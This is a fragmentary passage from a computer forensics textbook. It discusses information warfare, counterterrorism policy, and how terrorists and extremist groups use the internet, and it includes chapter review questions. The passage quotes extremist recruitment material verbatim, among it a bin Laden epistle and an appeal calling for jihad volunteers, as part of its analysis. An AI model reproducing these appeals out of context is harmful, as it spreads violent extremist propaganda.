More anarchic futures in the third world could fuel this type of terrorism, threatening America’s systemic interests as a global power and placing
constraints on the United States’ international engagement
...
Many established images of counterterrorism policy, especially the use of
force against state sponsors, are losing their relevance as traditional forms of terrorist behavior and organization (largely a product of the ideological and national
liberation movements of the 1960s–1980s) give way to new patterns
...
It is therefore more lethal
...
The absence of clear-cut sponsorship, above all,
will complicate the task of deterrence and response
...
U.S. Exposure
Foreign experts see U.S. exposure increasing but view the problem in narrower
terms
...
Policy makers and observers in these allied countries are not surprisingly focused on specific
national risks, few of which are analogous to risks facing the United States at home
and abroad
...
Notably, experts in all three countries share a degree of
skepticism about technology as a solution in counterterrorism
...
Treating terrorism as one of many national security challenges suggests a multidimensional approach
...
The environment-shaping aspect aims to create conditions for successfully managing terrorist risks,
making terrorism more transparent, shrinking “zones of chaos,” harnessing key
alliances to the counterterrorism effort, reducing U.S. exposure, and cutting off
terrorism’s resources
...
Implications for Military Strategy and the U.S. Air Force
In many instances, air and space power will not be the best instruments in the U.S. counterterrorism arsenal, and air power will rarely be used independently against
terrorism
...
There will also be instances, as in the past, where air and space power will be
instruments of choice in the fight against terrorism
...
Events in Sigonella (Sicily) and Afghanistan as well as Operation El Dorado
Canyon may be key models for the future
...
Deterrence and response will likely evolve in the direction of a more “personalized” approach, emphasizing the monitoring and attack of key nodes in terrorist networks and the forcible apprehension of terrorist suspects—with or without
the cooperation of local states
...
Air and space power will help make terrorism (an inherently amorphous phenomenon) more transparent
...
As terrorism becomes more diffuse and its sponsorship increasingly hazy, finding the
“smoking gun” will become more difficult but essential to determine strategies and
build a consensus for action
...
Gaining leverage in addressing the new terrorism will be a key strategic and
technical challenge
...
At the same time, policy instruments, including
air and space power, will need to concentrate on detecting and preventing the use of
weapons of mass destruction by terrorists—whether as a stand-alone apocalyptic act
or as a low-tech delivery system in the hands of adversaries
...
Terrorism is increasingly an urban
phenomenon worldwide
...
Terrorists seeking to influence political conditions have many incentives to attack urban targets
...
The use of air power in a counterterrorist mode introduces the
more general problem of operating in an urban environment (the difficult Israeli
experience in Beirut and South Lebanon is instructive)
...
Operations against them or to rescue
hostages will pose severe challenges for the use of air power, not least the risk of
placing uninvolved civilians in harm’s way
...
Air power’s pervasiveness and speed are advantages in the face of transnational
and transregional terrorism
...
Where terrorists and their sponsors can be identified and attacked with purpose, the global sight and reach of air- and space-based assets will be valuable to national decision makers
...
Air and space power can be used in concert with covert action, diplomacy, economic instruments, and joint military operations
...
Operations using a range of instruments
can be designed to act, in parallel, on terrorist supporters, terrorist infrastructure
and networks, and the terrorists themselves
...
The collapse of the Soviet bloc and
the end of its covert funding and encouragement of terrorism led to a decline in the
militant and violent left-wing terrorist groups that were a feature of the age
...
This is not to say that state-backed terrorism has ceased, but
rather that the spectrum of terrorism has widened
...
The new terrorism may seek out military or government
targets, but it also seeks out symbolic civilian targets, and the victims have mostly
been innocent civilians (Alfred P
...
Growing concern about this new terrorism has been paralleled by concern about
the employment of the new information and communication technologies (ICTs)
...
They allow the diffusion of C2, they allow boundless new opportunities for communication, and they
allow the players to target the information stores, processes, and communications of
their opponents
...
The use of ICTs to influence, modify, disrupt, or damage a nation-state, its institutions, or population by influencing the media or by subversion has been called
“netwar.”
...
What particularly distinguishes netwar from other forms
of war is that it targets information and communications and may be used to alter
thinking or disrupt planned actions
...
Netwar is therefore of particular interest to those engaged in nonmilitary war
and those operating at the sub-state level
...
So far, however, it appears to be of greater interest to extremist advocacy groups
and terrorists
...
The growth of such groups, and their growing power relative to that of nation-states, suggests an evolving power-based relationship for both
...
Most modern adversaries of nation-states, in the realm of low-intensity conflict—such as international terrorists, single-issue extremists, and ethnic and religious extremists—are organized in networks, although their leadership may
sometimes be hierarchical
...
Their doctrine, training, and modus operandi have, all
too often, been predicated on combating a hierarchy of command like their own
...
The Tokyo subway attack by Aum Shinrikyo, the Oklahoma City bombing, and the
9-11 terrorist attacks would have been unthinkable a generation ago
...
Cyberspace is becoming a new arena for political extremists: the potential for
physical conflict to be replaced by attacks on information infrastructures has
caused states to rethink their concepts of warfare, threats, and national assets at a
time when information is recognized as a national asset
...
Also, the arrival of the Internet has provided the first forum in history for all the
disaffected to gather in one place to exchange views and reinforce prejudices
...
Preeminent among the extremist and terrorist groupings who have entered cyberspace faster and more enthusiastically than others are the far right (white
supremacists and neo-Nazis) and radical Islamists
...
What characterizes these two groups are their transnational natures
...
The Islamist diaspora, now spread worldwide, seeks a return to divine-ruled states (or even one transnational state) in which all Muslims will
live under the norms and laws of the Arabian peninsula in the first and second
centuries of the Islamic era (the seventh and eighth centuries of the Common Era)
...
Their ideas and their use of cyberspace will
be further discussed in Chapter 15
...
This clearly reflects the more widespread ICT access in North America
...
One observer noted that the Internet has not replaced other communication
media for the far right and that its largest use in this regard has been to advertise the
sale of non-Internet-related propaganda, such as books, audiotapes, and videos
...
The Seattle-based Coalition
For Human Dignity observed that far right events in the United States, which were
heavily promoted on the Internet only, were failures
...
Surfing the Net has replaced real action
...
Not only do individuals want risk-free revolution, they now want people-free revolution
...
It allows
individuals to spend their lives interacting with a machine rather than with people
...
Unless law enforcement and national security agencies can
move quickly, they will leave national infrastructures defenseless
...
Therefore, what is significant for the far right and its use of the Internet is that
it possesses the potential to offer the relatively small numbers of people involved a
means to communicate, develop a sense of common purpose, and create a virtual
home symbolically
...
These
properties make it uniquely suitable for maintaining relationships among groups
that are prone to attrition, because forms of association can be established at a social and geographical distance
...
What is apparent, however, is that
warfare is shifting toward attacking civilian targets and that sub-state terrorists and
other extremists are increasingly targeting civilian infrastructures
...
It is therefore the civilian infrastructure that is the most vulnerable; the military can protect
its own infrastructure, despite media reports that it is vulnerable and a constant victim of hacking
...
There is only a
global information infrastructure
...
This is true because there is no way to sever the United States from
the information infrastructure that connects the rest of the world
...
It is just as easy now to engage in a cyberattack from Tehran as it is from Pomeroy, Ohio
...
Rogue IW offers combatants the ability to
execute asymmetrical attacks that have nonlinear effects against an adversary
...
Furthermore, rogue IW offers
weaker enemies (even at the sub-state level) a strategic alternative to attrition—an
attractive feature, especially when facing an opponent with significantly stronger
conventional forces
...
Targets of such attacks might include C2 networks,
satellite systems [5], and even the power grids of the continental United States
...
In contrast, terrorism has been used by states and sub-state groups for millennia
...
The intended target of a terrorist act goes beyond the immediate victims
...
The United States experienced a tragic example of
this effect in the 1983 bombing of the U.S. Marine barracks in Beirut, the USS Cole
in Yemen in 2000, and the 9-11-2001 terrorist attacks, where a small terrorist
group, clearly weaker than the U.S. military, nevertheless executed an effective
strategic attack against the United States
...
The capabilities are out there already; they just are not being tapped
...
The problem of terrorism, on the other hand, has been in the
headlines and in the social consciousness for decades, especially since the technological advance of intercontinental flight
...
If comparisons are substantiated as more than circumstantial, then the lessons
that might be applied to rogue IW defense from successes and failures of 33 years
of countering terrorism should be examined closely
...
The bombing of the Murrah Building in Oklahoma City and the 9-11 terrorist
attacks were two of many major events to remind the military that the continental
United States no longer offers sanctuary from terrorism
...
The military should organize and prepare for potential rogue IW attacks against them without necessarily having a formal definition and without having to experience a massive
information attack
...
A wide-scale information attack could involve systems under the responsibility of agencies across
the government and even the commercial sector
...
In the case
of the Oklahoma City bombing, organizations such as Bureau of Alcohol, Tobacco,
and Firearms (ATF) and the FBI investigated the incident, and the Federal Emergency Management Agency (FEMA) responded with crisis mitigation using both
federal and local resources
...
Clearly, rogue IW defense will demand many resources throughout the federal
government
...
For example,
terrorism policies under President Reagan suggested that such an organized U.S.
counterterrorism agency (whether newly created or placed within an existing
agency) would not have been feasible
...
Terrorism is a complex phenomenon requiring a comprehensive response
...
It would be difficult, if not impossible, to create a single department with
The Information Warfare Arsenal and Tactics of the Military
399
the needed jurisdiction to control the U.S. response to terrorism and would lead to
even greater policy and process problems
...
Furthermore, the distributed nature of the problem implies a distributed response
from the agencies owning the appropriate capabilities
...
An IW-D Oversight Office should be endowed with an independent budget and tasking authority
to coordinate the decision-making process, identify capabilities needed to respond,
and inform the agencies that own the capabilities as to their defensive rogue IW
roles
...
This
type of organization resembles, at a much broader range, the joint staff of the DoD,
but with a budget as well as tasking authority for IW-D
...
DoD has also articulated a similar concept for an office within the Executive
Office of the President, organized for countering terrorism, as a potential focal
point for the oversight of the U.S. antiterrorist program
...
It would see
that the necessary resources and capabilities are there when they are needed
...
An Executive IW-D Oversight Office would be in a prime position to identify
and coordinate the investigative agencies, defense organizations, and all elements of
the intelligence community that would be in positions to recognize and respond to
attack
...
Such an office should also interact
with the commercial sector, reflecting the extent to which commercial interests
would be affected in IW and the contribution industry can make to solutions
...
In addition to reorganizing the bureaucracy, an IW-D Oversight Office might
reorganize priorities
...
One-hundred percent protection of an infrastructure is virtually impossible
...
These capabilities are fundamental to any indications and warnings
system and are especially crucial in IW because protection is so fluid
...
A policy for public awareness and education in the event of an information crisis (regionally coordinated in an organization similar to FEMA) might stave off panic, alert the public to measures they could
take to assist, and lessen immediate public pressure on government officials to “do
something”
...
The past 37 years have shown the United States the paradox that “low-intensity conflict” has posed to the world’s mightiest military power
...
As stated
in the beginning, analogies can be useful, but at a certain point, relying on them
for analysis becomes harmful
...
The unfortunate lesson of terrorism is that as
long as the United States is unwilling to cede their liberty to prevent violence,
there are no total solutions
...
IW has yet to emerge
from its dogmatic stage and still offers more slogans than lessons, yet in retrospect
of 37 years of fighting terrorism in a concentrated national and international effort,
it is unclear whether an electronic Pearl Harbor would elicit a federal response
other than the ad hoc overreactions and short-term task forces that have characterized U.S.
counterterrorism policy
...
Preempting a
rogue IW attack with a multiagency policy of coordination could save the United
States from their adversaries, and it might even save them from themselves
...
Terrorism in the 1990s and the present time is no exception
...
Hamas’ and
Hezbollah’s stepped-up terrorism in Israel undoubtedly influenced the outcome
of Israeli elections, and it achieved its immediate objective of setting back the
peace process on which Palestine Authority President Yasser Arafat had gambled
his future
...
Terrorists caused disruption and destabilization in other parts of the world,
such as Sri Lanka, where economic decline has accompanied the war between the
government and the Tamil Tigers
...
Even in Algeria, where terrorism has exacted the highest toll in human
lives, Muslim extremists have made little headway since 1993, when many predicted the demise of the unpopular military regime
...
In those cases, however,
the terrorists had first forsworn violence and adjusted to the political process
...
That is true, but only where there is much inflammable material: as in Sarajevo in 1914, so in the Middle East and elsewhere today
...
Nevertheless, terrorism’s prospects, often overrated by the media, the public, and
some politicians, are improving as its destructive potential increases
...
The past few decades have witnessed the
birth of dozens of aggressive movements espousing varieties of nationalism, religious
fundamentalism, fascism, and apocalyptic millenarianism, from Hindu nationalists
in India to neofascists in Europe and the developing world, to the Branch Davidian
cult in Waco, Texas
...
Now, mail-order catalogs tempt militants with readily available, far
cheaper, unconventional as well as conventional weapons—the poor man’s nuclear
bomb, Iranian President Ali Akbar Hashemi Rafsanjani called them
...
Governments have engaged in the production of chemical weapons
for almost a century and in the production of nuclear and biological weapons for
many decades, during which time proliferation has been continuous and access
ever easier
...
While in the past missiles were deployed only
in wars between states, recently they have played a role in civil wars in Afghanistan
and Yemen
...
402
Computer Forensics, Second Edition
Until the 1970s, most observers believed that stolen nuclear material constituted the greatest threat in the escalation of terrorist weapons, but many now think
the danger could lie elsewhere
...
Some groups have state sponsors that possess or can
obtain weapons of the latter three types
...
The Aum Shinrikyo cult staged a
poison gas attack in March 1995 in the Tokyo subway; exposure to the nerve gas
sarin killed 10 people and injured 5,000
...
To Use or Not to Use?
If terrorists have used chemical weapons only once and nuclear material never, to
some extent the reasons are technical
...
The manufacture of nuclear weapons is not that simple, nor is delivery to their
target
...
Only governments can legally procure it, so even in this age of proliferation, investigators could trace those abetting
nuclear terrorists without great difficulty
...
Iranian agents in
Turkey, Kazakhstan, and elsewhere are known to have tried to buy such material
originating in the former Soviet Union
...
The
terrorists behind the 1995 attack in Tokyo chose a convenient target where crowds
of people gather, but their sarin was apparently dilute
...
They are relatively easy to procure,
but storage and dispersal are even trickier than for nerve gases
...
Aum Shinrikyo reportedly
released anthrax bacteria (among the most toxic agents known) on two occasions
from a building in Tokyo without harming anyone
...
Difficulties could be overcome, however, and the choice of unconventional weapons will in the end come down to the specialties of the terrorists and
their access to deadly substances
...
The risk of detection and subsequent severe retaliation or punishment is
great, and although this may not deter terrorists, it may put off their sponsors and
suppliers
...
Unconventional weapon strikes could render whole regions uninhabitable
for long periods
...
And although terrorism seems to be tending toward more indiscriminate killing and mayhem, terrorists may draw the line at weapons of
superviolence likely to harm both foes and large numbers of relatives and friends,
for example, Kurds in Turkey, Tamils in Sri Lanka, or Arabs in Israel
...
There is not much heroism in spreading botulism or anthrax
...
Broadly speaking, terrorists will not engage in overkill if their traditional
weapons (the submachine gun and the conventional bomb) are sufficient to continue the struggle and achieve their aims, but the decision to use terrorist violence
is not always a rational one; if it were, there would be much less terrorism, because
terrorist activity seldom achieves its aims
...
It might also lead to a last desperate attempt to defeat the hated enemy by arms not tried before
...
Post Apocalypse
Terrorist groups traditionally contain strong quasi-religious, fanatical elements,
for only total certainty of belief (or total moral relativism) provides justification
for taking lives
...
Fanatical Muslims consider the killing of the enemies of God
a religious commandment and believe that the secularists at home as well as the
State of Israel will be annihilated because it is Allah’s will
...
Sectarian fanaticism has surged during the past decade, and, in general, the smaller the group,
the more fanatical the group
...
Nevertheless, the belief in the
impending end of the world is probably as old as history, but for reasons not entirely clear, sects and movements preaching the end of the world gain influence toward the end of a century, and all the more at the close of a millennium
...
Others, however, believe that the
sooner the reign of the Antichrist is established, the sooner this corrupt world will
be destroyed and the new heaven and earth foreseen by St
...
Extremist millenarians would like to give history a push, helping create world-ending havoc replete with universal war, famine, pestilence, and other scourges
...
They have their own
subcultures, produce books and CDs by the thousands, and have built temples and
communities of whose existence most of their contemporaries are unaware
...
Although the more extreme
apocalyptic groups are potentially terrorist, intelligence services have generally
overlooked their activities; hence, the shock over the subway attack in Tokyo and
Rabin’s assassination, to name but two recent events
...
For instance, extreme environmentalists, particularly the so-called restoration ecologists, believe that environmental disasters will destroy
civilization as they know it (no loss, in their view) and regard the vast majority of
human beings as expendable
...
If the eradication of smallpox
upset ecosystems, why not restore the balance by bringing back the virus? The
motto of Chaos International, one of many journals in this field, is a quotation
from Hassan I
...
The premodern world and postmodernism meet at this point
...
The practitioners of terrorism,
up to the present time, were nationalists and anarchists, extremists of the left and
the right, but the new age has brought new inspiration for the users of violence
...
In the future, terrorists will be individuals or like-minded
people working in very small groups (like the 9-11 terrorists), on the pattern of the
technology-hating Unabomber, who apparently worked alone sending out parcel
bombs for over two decades, or the perpetrators of the 1995 bombing of the federal
building in Oklahoma City
...
The ideologies such individuals and minigroups
espouse are likely to be even more aberrant than those of larger groups
...
Thus, at one end of the scale, the lone rogue terrorist has appeared, and at the
other, state-sponsored terrorism is quietly flourishing in these days when wars of
aggression have become too expensive and too risky
...
Proliferation of the weapons of mass destruction does not mean most terrorist
groups are likely to use them in the foreseeable future, but some almost certainly
will, in spite of all the reasons not to
...
Individuals and small
groups, however, will not be bound by the constraints that hold back even the most
reckless government
...
Earlier terrorists could kill kings or high officials, but others only too
eager to inherit their mantle quickly stepped in
...
Defense, the police, banking, trade, transportation,
scientific work, and a large percentage of the government’s and the private sector’s
transactions are online
...
Hence, the growing speculation about infoterrorism
and cyberwarfare
...
What he could achieve, a terrorist
could too
...
The possibilities for creating chaos are almost unlimited even now, and
vulnerability will almost certainly increase
...
If the
new terrorism directs its energies toward IW, its destructive power will be exponentially greater than any it wielded in the past—greater even than it would be with
biological and chemical weapons
...
Electronic thieves, whether
engaged in credit card fraud or industrial espionage, are part of the system, using it
rather than destroying it; its destruction would cost them their livelihood
...
The Kurdish Workers Party, the IRA, the Basque ETA, and
the Tamil Tigers want to weaken their enemies and compel them to make far-reaching concessions, but they cannot realistically hope to destroy them
...
All that leads us well beyond terrorism as the military has known it
...
The Bible says that when the Old Testament hero Samson brought down the temple, burying himself along with the
Philistines in the ruins, “the dead which he slew at his death were more than he slew
in his life”
...
But with the
new technologies and the changed nature of the world in which they operate, a
handful of angry Samsons and disciples of apocalypse would suffice to cause havoc
...
The Menace of Amateur Rogue IW
According to DoD government analysts, with a member base of 79,000, the amateur
rogue CyberArmy (hackers) may have the biggest armament the Net has ever seen,
rallying to take down Web sites that “abuse” the World Wide Web—and removing
power from governments
...
The CyberArmy wants to regulate the Internet so that the government doesn’t
come in and regulate it
...
Growing to a full size army of
“Netizens,” the group has since shifted its views—because of privacy issues and
government intervention
...
If you
deregulate, you end up with anarchy
...
Members have to solve puzzles (which is usually breaking codes and
encryption) to move on to the next commanding level
...
Some missions include hunting for, and taking down, child
pornography Web sites
...
Colonel, Colonel, General, and Marshal
...
This division has taken down about four dozen child porn sites in the last few
years, and was also instrumental in bringing down the Wonderland Club child porn
ring recently
...
Because the Internet is global, governments aren’t the right authority to police it
...
If a site
is defaced it’s usually in the form of protest
...
However, they’re moving away from that
...
Many people join CyberArmy
because they are sick and tired of child pornography and Net censorship
...
The
CyberArmy site also posts discussion boards and Internet tools for users and has a
section dedicated to teaching network security
...
U.S. citizens and
the organizations that provide them with the vital services they need can find no
sanctuary from these attacks
...
The consequences of a well-planned and coordinated
attack by a relatively sophisticated foe could be serious
...
How the public will respond to
the threat of IW infrastructure attacks or to actual attacks is unclear but will be a
major determinant of future policy and actions
...
U.S. citizens are becoming increasingly dependent on automation in every aspect of their lives
...
With this increased need for exchanges of information (and products), vulnerabilities increase
...
Given this situation, you need to focus on two goals
...
Second, you need to build a
firm foundation upon which you can make steady progress by continually raising
the cost of mounting an attack and mitigating the expected damage of the IW arsenal and tactics of the military
...
Conclusions
Information warfare (IW) has become virtually synonymous with the revolution in information technologies and its potential to transform military strategies and capabilities
...
Without being
able to defend vital information, information processes, and information systems, such a strategy is doomed to failure
...
The battlespace associated with IW has been a constantly expanding one, moving far beyond traditional military situations
...
This has
stretched the meaning of IW to the breaking point and has sowed more confusion than enlightenment
...
The scope, or battlespace, of information warfare and strategy (IWS) can be defined by the players and three dimensions of the nature of their interactions,
the level of their interactions, and the arena of their interactions
...
Nonstate actors (including political, ethnic, and religious groups; organized crime;
international and transnational organizations; and even individuals empowered by information technology) are able to engage in information attacks and
to develop information strategies to achieve their desired ends
...
These include
activities that range from propaganda campaigns (including Media War), to attacks (both physical and nonphysical) against commanders, their information
sources, and the means of communicating with their forces
...
Technological advances have added new forms such as electronic warfare (EW)
and “hacker warfare”
...
Strictly speaking, because these attacks can be launched during peacetime at
nonmilitary targets by nonmilitary groups, both foreign and domestic, the term
IW-D should be IWS-D
...
This overview of IW-D does not attempt to deal with the problems of defending against all of the different kinds of information attacks, but rather focuses
its attention on the subset of IW that involves attacks against information infrastructure, including what has become known as “hacker warfare” and in its
more serious form, “digital warfare”
...
Some military
organizations have been worrying about this for a long time and have developed and
implemented plans to keep on top of this increasingly serious set of threats
...
It might be helpful, even for those military organizations that feel they are well prepared, to review the list of suggested action steps to determine what they need to do to be better prepared for the future
...
With the preceding in mind, when completing the Information Warfare
Arsenal and Tactics of the Military Checklist (Table F14
...
The order is not significant; however, these are the activities for which
the researcher would want to provide a detailed description of procedures, review,
and assessment for ease of use and admissibility
...
Finally, let’s move on to the real interactive part of this chapter: review questions and exercises, hands-on projects, case projects, and optional team case project
...
CHAPTER REVIEW QUESTIONS AND EXERCISES
True/False
1
...
2
...
3
...
4
...
5
...
Multiple Choice
1
...
B
...
D
...
Operations security
Commercial deception
Psychological operations
Electronic warfare
Targeting
2
...
Terrorism
B
...
Counterterrorism versus new terrorism
D
...
S
...
General counterterrorism strategy
3
...
Attempt to deal with the problems of defending against all of the different
kinds of information attacks
B
...
Make deterrence relevant to non-state actors as well as state sponsors
D
...
DoD has also articulated a similar concept for an office within the Executive
Office of the President, organized for countering terrorism, as a potential focal
point for the oversight of the U.S. antiterrorist program
...
Monitor and coordinate activities of the line agency and departments
...
Identify unneeded capabilities
...
Identify special resources that might be mobilized if an international incident occurs
...
Pull together current intelligence and ongoing analysis and research efforts
...
Identify terrorist incidents
...
Nation-states or combinations of nation-states are not the only players
...
Political, ethnic, and religious groups
B
...
Law enforcement organizations
D
...
Individuals empowered by information technology
Exercise
The board of directors of a technical research company demoted the company’s
founder and chief executive officer
...
Upon his termination, the executive took home two computers; he returned them to the company five days later, along with another company computer
that he had previously used at home
...
How did the CFST go about conducting the forensics examination?
HANDS-ON PROJECTS
A senior member of a major organization was under suspicion of downloading thousands of pornographic images from the Internet
...
How did the CFS go about conducting the investigation?
Case Project
A major high-tech company took over a smaller subsidiary in a related, but noncompeting, business area
...
Most of the previous management team was bought out and left the
company; others were persuaded to stay on to manage the new subsidiary
...
Business results of the new subsidiary had simultaneously begun to deteriorate
...
How did the CFST go about conducting their examination?
Optional Team Case Project
An insurance company was contesting a claim for $400,000 for loss of all data from
a company’s central computer
...
How
was the CFST able to help the insurance company?
REFERENCES
[1] Vacca, John R
...
[2] Vacca, John R
...
[3] Vacca, John R
...
[4] Vacca, John R
...
[5] Vacca, John R
...
[6] Vacca, John R
...
15 The Information Warfare Arsenal and Tactics of Terrorists and Rogues
The information warfare (IW) arsenal and tactics of terrorists and rogues have
become increasingly transnational as the networked organizational form has
expanded
...
Now
that terrorism is increasingly substate, or semidetached, networking and interconnectivity are necessary to find allies and influence others, as well as to effect command and control
...
It therefore might be said that a shift is taking place
from absolute hierarchies to hydra-headed networks, which are less easy to decapitate
...
In many ways the Afghan War was a seminal event in promoting the networked
form in that it showed that fluidly organized groups, driven in this case by a religious
imperative, could defeat an experienced hierarchically structured army
...
A rigid hierarchical structure is more easily penetrated and neutralized
...
An investigation by the Federal Bureau of
Investigation into terrorist activity in the United States indicated that part of Palestinian Islamic Jihad’s command and control system was located in Tampa, Florida
...
Islamist terrorists may be said to fit the network ideal
...
It is not the intention here that the term “Islamists” should refer only to terrorist
organizations, but rather to those Muslim militants who believe that Islam is incomplete without its own state, one in which Shariah provides the system of governance, and who campaign for its imposition
...
The followers of Hasan al Banna, Sayyid Qutb, and Abdul Ala
Maududi, the organizations they founded, Ikhwan al Muslimoon and Jamaat Islami, and the ideological off-shoots these have spawned, give rise to the Jihadist ideology
...
The ultimate experience is, of course, Jihad, which for Islamists means armed battles against communists (Afghanistan) or Zionists (Palestine and Israel) or, for the
radicals, against renegades and the impious
...
An example of
the networked form among such Islamist organizations is that of the Algerian Armed
Islamic Group, the GIA
...
At the same time, sympathizers were also safe-housing some of its weapons and explosives in Belgium
...
Foremost among them is MSANEWS
...
The MSANEWS also posts articles and communiqués from non-Islamist Muslim
and non-Muslim sources, claiming that it has condemned terrorism and that it no
longer reposts communiqués of organizations that advocate terrorism
...
As with some other Islamist groups, Muslimedia International also promotes antisemitism and Holocaust denial and provides links with the American
Holocaust denier, Michael Hoffman II and his Campaign for Radical Truth in History, thereby highlighting the interconnectivity possibilities between totally different
ideologies sharing a perceived common enemy
...
Recently, U.S. law enforcement officials and other experts disclosed details of how extremists hide maps and
photographs of terrorist targets in sports chat rooms and on pornographic bulletin
boards and other popular Web sites
...
To a greater and greater
degree, terrorist groups, including Hezbollah, Hamas, and bin Laden’s al Qaeda, are
using computerized files, email, and encryption to support their operations—like
the train bombing in Madrid in the winter of 2004
...
It’s something the
intelligence, law-enforcement, and military communities are struggling to deal with
...
Only the members of the terrorist organizations, knowing the hidden
signals, are able to extract the information
...
Their first U.K.-based site was hosted
by Imperial College, London, but following complaints to the college authorities,
the site was closed down
...
Al-Muhajiroun (The Emigrants) whose U.K. leader,
Omar Bakri Mohammed, was the founding leader of Hizb-ut-Tahrir in Britain, and
from which he split claiming differences with the Middle-East-based leadership,
also provides details of its activities, as well as lists of its hardcopy publications and
contacts
...
As a consequence of his endorsement of the
bombings of the U.S. embassies in Dar-es-Salaam and Nairobi, his postings are no
longer carried by MSANEWS
...
MSANEWS provides a list of Internet resources about Hamas,
including copies of its covenant, its official communiqués (at Assabeel On-line),
and communiqués of its military wing, the Izz al-Din Al-Kassam Brigades
...
Hamas’ own site, which
posts in Arabic, is the Palestine Information Centre
...
Sheikh Yusuf al-Qaradawri of the Egyptian
Ikhwan al-Muslimoon (Muslim Brotherhood) lives in Qatar and serves as the
Imam (religious leader) for the Palestinian Hamas
...
Sheikh Abu
Hamza, an Egyptian national and former Afghan Jihad volunteer, serves as a propagandist for the Algerian GIA and Imam for the Yemeni Jihad group but lives in
London
...
Although some commentators have argued that modern cultural forces, such
as ICTs, serve to undermine Islamization in Muslim society, it is equally easy to
argue that they provide a new and growing medium by which Islamism is disseminated
...
The growing number of advertisements, on the Internet and in Muslim
papers and journals, for conferences to discuss the use of the Internet to promote
Islam, or Islamism, supports the thesis that many activists and religious teachers see
these developments as positive ones to be recommended and encouraged
...
Calls to carry out Jihad are frequently cloaked in
religious and pseudo-religious language, but the implication is clear for the target
audience
...
For example, bin Laden’s Ladenese Epistle reads,
The sons of the land of the two Holy Places had come out to fight against the Russian in Afghanistan, the Serb in Bosnia-Herzegovina, and today they are fighting in
Chechenia and—by the Permission of Allah—they have been made victorious
over your partner, the Russians
...
I say: Since the sons of the land of the two Holy Places feel and strongly believe that
fighting (Jihad) against the Kuffar in every part of the world, is absolutely essential;
then they would be even more enthusiastic, more powerful and larger in number
upon fighting on their own land
...
A recent posting, “The Islamic Legitimacy of the Martyrdom Operations,” states that martyrdom is forbidden in Islam,
but cites approvingly those martyrs who willingly gave their lives for Muslim causes
and then transposes these causes to contemporary issues
...
Azzam Publications, named after Abdullah Azzam, a Palestinian who became
a military leader in Afghanistan and who was assassinated in Pakistan in 1989, has
also published calls for Jihad volunteers:
The Saudi Government does not intend to help the Muslims in Kosova and it has
prevented its nationals from going there to fight
...
Redistribute this e-mail message all over the world
...
e-mail the Saudi
Embassy in Washington with messages of protest
...
Wait for the Kosova bulletin from Azzam Publications
...
The group is tiny, but its foreign contacts are numerous, widespread and
growing
...
Final Conflict also acts as a news agency for Holocaust deniers (in much the
same way as MSANEWS does for Islamists), many of whom are also far right extremists
...
Some invitees to a conference held by the Adelaide Institute were
refused permission to visit Australia by its Department of Immigration, but the easy
access to the Internet and video links facilitated conference presentations that otherwise might not have taken place
...
The British neo-Nazi, David Myatt, of the National Socialist Movement posted his Practical Guide to Aryan Revolution in November 1997 at the Web site of Canadian Bernard Klatt in order to evade police
scrutiny
...
The contents provided a detailed step-by-step guide for terrorist insurrection with
advice on assassination targets, rationales for bombing and sabotage campaigns,
and rules of engagement
...
Myatt is currently
the subject of a British criminal investigation for incitement to murder and promotion of race hatred
...
Herve Guttuso, the French leader of the
Charlemagne Hammer Skins, was arrested in Essex at the same time as eight members were arrested in the South of France
...
According to the French Interior Ministry, police in Toulon traced the London address of the Internet site, which was being
accessed about 7,000 times a month
...
The investigators found that the
Charlemagne group appeared to be one of the largest and best organized neo-Nazi
groups yet uncovered, with a coordinated international structure and logistical centers for disseminating violent racist propaganda, based principally in Britain and
America
...
The British far right may have been slower to realize the command and control
possibilities of ICTs than their U.S. or German co-ideologies, but they appear to be
catching up
...
In 1999, the Pentagon had to admit that there had been a major assault on its
computer systems
...
“It doesn’t matter what government
specialists invent to counter the techno-terrorist; there is always a way around their
antihacker programs, and the more ZOG relies on computers, the more damage can
be done by attacking their systems”
...
Some groups are more direct and refer to the “Jewish Occupied Government”
THE TERRORIST PROFILE
Sid-Ra, a 6-foot-4-inch, 350-pound giant of a man, paces between his “subjects” in
the smoke-filled Goth club Click + Drag, located in the old meat-packing district of
Manhattan
...
Sid is a hacker-terrorist and an acknowledged “social engineer” with curious nocturnal habits
...
When night comes, they transform into something quite different
...
They even have a name for it: hactivism
...
Recently, for example, the Libertarian Party set
up a table at the HOPE (Hackers on Planet Earth) conference
...
Even without such civil-liberties groups trying to organize them, hacktivists have
been busy on their own
...
in Montreal
...
(http://www
...
com), and they’re trying to get the Internet out to third world
human rights organizations through groups such as Cult of the Dead Cow Communications (cDc; http://www
...
com/)
...
Sid feels hacktivism’s pull so strongly that he makes a dramatic claim: “The Internet is the next Kent State, and we’re the ones who are probably going to get shot
...
Except for the four-year jail terms handed
down to Kevin Mitnick and Kevin Poulsen, sentencing for even criminal hacking in
2003–2004 has been relatively light (mostly probation and fines) because of the suspects’ young ages
...
Mitnick’s last arrest was by the FBI on February 15, 1995—he was charged with
breaking into some of the United States’ most “secure” computer systems
...
” He worked for SRI International by
day, and hacked at night
...
Among other things, he reactivated old Yellow Page escort
telephone numbers for an acquaintance who then ran a virtual agency
...
Poulsen is now a journalist and serves as editorial director for SecurityFocus
...
The government tries to put electronic activism into the peg of cyberterrorism
and crime with its infowar eulogies (IW success stories), but E-Hippies, cDc, and
others aren’t criminals
...
Another group
reaching out to hackers and technologists is the EFF
...
Hackers question conventional models
...
” They say, “How can I make it better?” They look at society that way too—their government, their schools, and their social situations
...
In the Motion Picture Association of America (MPAA) case, staffers at 2600
Enterprises Inc
...
Because the link was editorial content, it set Sid off on another
diatribe
...
At HOPE, the
party’s New York State committee (http://www
...
com) handed out fliers,
signed up recruits, and took a “sticker” poll of party affiliations
...
Many party members are programmers
...
Hackers can
offer them freedom, because the Internet routes around tyranny
...
Take a young dude named Alpha Underflow, for instance, who late one night broke
the lock to a lit-up roadside-construction sign and reprogrammed it to read, “Hack
Planet Earth” in support of the 2600 Magazine staff, but then, he also likes to use his
reprogrammed garage-door opener to pop open his neighbor’s garage doors
...
In the mid-1990s, there was
more disillusionment as more bleeding-edge hackers ended up going to jail for
cracking
...
That means the older hackers do develop some scruples
...
eff
...
Now it’s rarely hacked
...
The process that turned the
hippie of 1968 into the employed investor of 1985 is similarly going on here today
...
Who are the real cyberterrorists? Are they for real?
Will the Real Cyberterrorists Stand Up
The debate over whether the United States faces imminent danger from cyberterrorist attacks took a new turn recently when the National Security Council declared
that terrorism may be too strong a word when describing potential cyberthreats
...
Maybe we shouldn’t be saying “cyberterrorism
...
” In the end, we’re going to know it when we see it—the difference
between joy-riding hackers and state-sponsored cyberattacks
...
Although the
